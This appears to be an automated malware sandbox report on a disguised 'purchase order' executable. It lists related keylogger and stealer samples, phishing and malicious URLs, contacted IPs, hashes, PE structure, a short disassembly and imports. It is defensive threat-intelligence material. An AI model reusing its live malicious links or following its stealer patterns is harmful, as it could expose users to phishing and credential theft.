                                      Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 149.154.167.220
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      TELEGRAMRURFQ__PO_PO 24090041-PDF____PDF.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
                                      BnxBRWQWhy.exeGet hashmaliciousStealc, VidarBrowse
                                      • 149.154.167.99
                                      NJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                      • 149.154.167.99
                                      enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                                      • 149.154.167.220
                                      1.cmdGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      2.cmdGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                      • 149.154.167.99
                                      dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                      • 149.154.167.99
                                      KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, VidarBrowse
                                      • 104.21.93.202
                                      http://toomdexter.kindofx.com/c/2734/14-13347393/2/Get hashmaliciousUnknownBrowse
                                      • 1.1.1.1
                                      https://ok.me/KtdI1Get hashmaliciousUnknownBrowse
                                      • 1.1.1.1
                                      Reff_Daiichi-sankyo_8580930869_n6T8Tseqk6.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 172.67.185.52
                                      Your Document-7617432882-8AhEHNmrLR Ready.msgGet hashmaliciousHTMLPhisherBrowse
                                      • 172.67.185.52
                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                      • 104.21.93.202
                                      https://ok.me/KtdI1Get hashmaliciousUnknownBrowse
                                      • 1.1.1.1
                                      https://docsignfile.z13.web.core.windows.net/&redirect_mongo_id=66fea70f62194c155d978939&utm_source=Springbot&utm_medium=Email&utm_campaign=66fea70f62194c155d97893aGet hashmaliciousHTMLPhisherBrowse
                                      • 172.67.69.232
                                      https://docsignfile.z13.web.core.windows.net/&redirect_mongo_id=66fea70f62194c155d978939&utm_source=Springbot&utm_medium=Email&utm_campaign=66fea70f62194c155d97893aGet hashmaliciousUnknownBrowse
                                      • 104.18.95.41
                                      MOfHb44mph.elfGet hashmaliciousUnknownBrowse
                                      • 172.67.128.161
                                      ORACLE-BMC-31898USMT Eagle Asia 1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 158.101.44.242
                                      KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 158.101.44.242
                                      Updated New Order.xlsGet hashmaliciousSnake KeyloggerBrowse
                                      • 158.101.44.242
                                      GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 193.122.130.0
                                      hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 193.122.6.168
                                      QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 158.101.44.242
                                      Athnaton_ANP00224_Specification.xlsGet hashmaliciousSnake KeyloggerBrowse
                                      • 158.101.44.242
                                      IEnetbookupdation.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                      • 193.122.6.168
                                      SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 158.101.44.242
                                      Price Request 02.10.24.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 158.101.44.242
                                      AS-26496-GO-DADDY-COM-LLCUSReff_Daiichi-sankyo_8580930869_n6T8Tseqk6.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 72.167.142.137
                                      Your Document-7617432882-8AhEHNmrLR Ready.msgGet hashmaliciousHTMLPhisherBrowse
                                      • 72.167.142.137
                                      5.dllGet hashmaliciousUnknownBrowse
                                      • 208.109.246.134
                                      shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                      • 118.139.176.2
                                      https://sms.outrightmarketing.com/Get hashmaliciousUnknownBrowse
                                      • 50.62.142.2
                                      https://gemmni-lgi.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                      • 198.71.248.123
                                      https://coenbsasezprrolgenz.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                      • 198.71.248.123
                                      https://metamskli0n.godaddysites.com/Get hashmaliciousUnknownBrowse
                                      • 198.71.248.123
                                      https://geminloogi.godaddysites.com/Get hashmaliciousUnknownBrowse
                                      • 198.71.248.123
                                      https://mettamisk_signin.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                      • 198.71.248.123
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      54328bd36c14bd82ddaa0c04b25ed9adFt.204815963710.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      dllhost.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      IEnetbookupdation.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                      • 188.114.97.3
                                      Price Request 02.10.24.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      3b5074b1b5d032e5620f69f9f700ff0eRFQ__PO_PO 24090041-PDF____PDF.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
                                      New order.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
                                      Refrence-Order#63729.pdfGet hashmaliciousAzorultBrowse
                                      • 149.154.167.220
                                      ra66DSpa.exeGet hashmaliciousXWormBrowse
                                      • 149.154.167.220
                                      https://www.sexpartnercommunity.com/?e7ak3e0m=57296397&tba4bck7=eyJpdiI6Imp1cHMxdGJERWI4SjBwNVYvSWdWeHc9PSIsInZhbHVlIjoiSGhGdTY1TlFyN1JJQm03UEJhZGZxQjV2NncyZ0JWajdJZnRWaWNBZlM2dzVxV05KdGx3TXZaaURxZzgraDNUYURDK2EwcFUra28rNEE2YTdRYWRhdFdwQkxaL09xeDRCVUt0Rm1IT3cxa3hPd1huM3FkN3NzNS9BYjEwV2hOY3dzblZ6TW1TaUdDeXBOTG9zc2FtU0VZKzhNeVgzS1FkTnE3WnA5NUZqWXJTQkVaNlN1UmUrZFFTUlZzZ05pbVlnIiwibWFjIjoiOTFjZDc5Y2FhNTBkNGYyYWYzZDRiYzhlYjljMjZmYTE1MzBhNGI2MmQ0NTFhYmYyZmVjN2IwMGUyNmFlNjU3MCIsInRhZyI6IiJ9&spaRoute=/livecams/all&trk=toza80hGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      http://masdeliveryusa.com/Get hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                      • 149.154.167.220
                                      tMREqVW0.exeGet hashmaliciousXWormBrowse
                                      • 149.154.167.220
                                      https://wvr4dgzxxavl6jjpq7rl.igortsaplin.pro/WFzFCiNxGet hashmaliciousHTMLPhisherBrowse
                                      • 149.154.167.220
                                      wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                      • 149.154.167.220
                                      No context
                                      Process:C:\Users\user\Desktop\z1PurchaseOrder.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):248320
                                      Entropy (8bit):7.874709862839905
                                      Encrypted:false
                                      SSDEEP:3072:fRdnQZAksgsbtS2xhW1LQ/kfZcLzDW9wYC2k6+84sFGu+ZJuXI1yOUYuUaPJD3Xm:7pl3SccfZ6Yq6+mGF4IoJzBD3Rc
                                      MD5:ABBFCA7A6654277205B00349A0872206
                                      SHA1:059B59F8035BDC06AB09E17BD7298ADA8F8235FB
                                      SHA-256:1ED2EF562907F667BC0BDAEFE0F9BFF6EBA3C8E1406EDFCDE10E65E8794B926F
                                      SHA-512:525332D182D4D309B0B10BEDD65CC2D29B1713899C23234861CA000C5E9FD88FD032545BB8FEE31D50E5582E8BFC8D614DEB4DB4007A563F73C59A4D5A191423
                                      Malicious:false
                                      Reputation:low
                                      Preview:{..4WL2A3AIZ..Z6.34TL2A7.IZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z.S34ZS.O7.@.q.[z..`<%AaG3&="Q7.0RZ:#FaU$i(%^z_=.p...,X%,t]=P.S34TL2A_Q.w|A.H.B.*`C.Isj%..+.-8..2.0.?e+.N.G.M.w"L]F.7hsY$.".JfoI?.0.$.Y9^.B.*L2A7AIZP0Z6S34TL..'IZP0.sS3xUH25.A.ZP0Z6S34.L.@<@@ZP.[6S.6TL2A7n.ZP0J6S3.UL2AwAIJP0Z4S31TL2A7AI_P0Z6S34T\6A7EIZ..X6Q34.L2Q7AYZP0Z&S3$TL2A7AYZP0Z6S34TL2."CI.P0Z6314..3A7AIZP0Z6S34TL2A7AIZP0Z6S.UL.A7AIZP0Z6S34TL2A7AIZP0Z6S34.A0AwAIZP0Z6S34TL.@7.HZP0Z6S34TL2A7AIZP0Z6S34TL2oC$1.P0Z..24T\2A7.HZP4Z6S34TL2A7AIZP.Z63.F0-F 7A.7P0Z.R34:L2A.@IZP0Z6S34TL2AwAI.~T;B234T..A7AiXP0L6S3>VL2A7AIZP0Z6S3tTL.oE2;9P0Z..24T,0A7.HZP.X6S34TL2A7AIZPpZ6.34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7AIZP0Z6S34TL2A7A
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.444046860731758
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 95.11%
                                      • AutoIt3 compiled script executable (510682/80) 4.86%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:z1PurchaseOrder.exe
                                      File size:1'220'789 bytes
                                      MD5:3ebef42f57673d6b260644654522b053
                                      SHA1:b63d68467a9be1260af9685b71eb8b54680e85d6
                                      SHA256:7ffba279d6f47ed76230be9dc7baae15b923dc09ba48f738d01e9beab32e9a58
                                      SHA512:72d25c34f67f5a291855c1602a8293dfbe02544605703630908f7a087a0eddbba1e31c8566e87c59b5b50863bcd5f5b0803d04d362c9716efda16984fbdee7d5
                                      SSDEEP:24576:ffmMv6Ckr7Mny5QLhVzGODNZaxNZ7fA+oED:f3v+7/5QLhVKAKtAtED
                                      TLSH:E445E112B7D680B2D9A33971297BE32AEB3575194327C4C797E01F778E211405F3A7A2
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                      Icon Hash:1733312925935517
                                      Entrypoint:0x416310
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                      Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                      Instruction
                                      call 00007F8394EF82ECh
                                      jmp 00007F8394EEC0BEh
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      push edi
                                      push esi
                                      mov esi, dword ptr [ebp+0Ch]
                                      mov ecx, dword ptr [ebp+10h]
                                      mov edi, dword ptr [ebp+08h]
                                      mov eax, ecx
                                      mov edx, ecx
                                      add eax, esi
                                      cmp edi, esi
                                      jbe 00007F8394EEC24Ah
                                      cmp edi, eax
                                      jc 00007F8394EEC3EAh
                                      cmp ecx, 00000100h
                                      jc 00007F8394EEC261h
                                      cmp dword ptr [004A94E0h], 00000000h
                                      je 00007F8394EEC258h
                                      push edi
                                      push esi
                                      and edi, 0Fh
                                      and esi, 0Fh
                                      cmp edi, esi
                                      pop esi
                                      pop edi
                                      jne 00007F8394EEC24Ah
                                      pop esi
                                      pop edi
                                      pop ebp
                                      jmp 00007F8394EEC6AAh
                                      test edi, 00000003h
                                      jne 00007F8394EEC257h
                                      shr ecx, 02h
                                      and edx, 03h
                                      cmp ecx, 08h
                                      jc 00007F8394EEC26Ch
                                      rep movsd
                                      jmp dword ptr [00416494h+edx*4]
                                      nop
                                      mov eax, edi
                                      mov edx, 00000003h
                                      sub ecx, 04h
                                      jc 00007F8394EEC24Eh
                                      and eax, 03h
                                      add ecx, eax
                                      jmp dword ptr [004163A8h+eax*4]
                                      jmp dword ptr [004164A4h+ecx*4]
                                      nop
                                      jmp dword ptr [00416428h+ecx*4]
                                      nop
                                      mov eax, E4004163h
                                      arpl word ptr [ecx+00h], ax
                                      or byte ptr [ecx+eax*2+00h], ah
                                      and edx, ecx
                                      mov al, byte ptr [esi]
                                      mov byte ptr [edi], al
                                      mov al, byte ptr [esi+01h]
                                      mov byte ptr [edi+01h], al
                                      mov al, byte ptr [esi+02h]
                                      shr ecx, 02h
                                      mov byte ptr [edi+02h], al
                                      add esi, 03h
                                      add edi, 03h
                                      cmp ecx, 08h
                                      jc 00007F8394EEC20Eh
                                      Programming Language:
                                      • [ASM] VS2008 SP1 build 30729
                                      • [ C ] VS2008 SP1 build 30729
                                      • [C++] VS2008 SP1 build 30729
                                      • [ C ] VS2005 build 50727
                                      • [IMP] VS2005 build 50727
                                      • [ASM] VS2008 build 21022
                                      • [RES] VS2008 build 21022
                                      • [LNK] VS2008 SP1 build 30729
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                      RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                      RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                      RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                      RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                      RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                      RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                      RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                      RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                      RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                      RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                      RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                      RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                      RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                      RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                      RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                      RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                      RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                      RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                      RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                      RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                      RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                      RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                      RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                      RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                      RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                      RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                      DLLImport
                                      WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                      VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                      COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                      MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                      PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                      USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                      KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                      USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                      GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                      ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
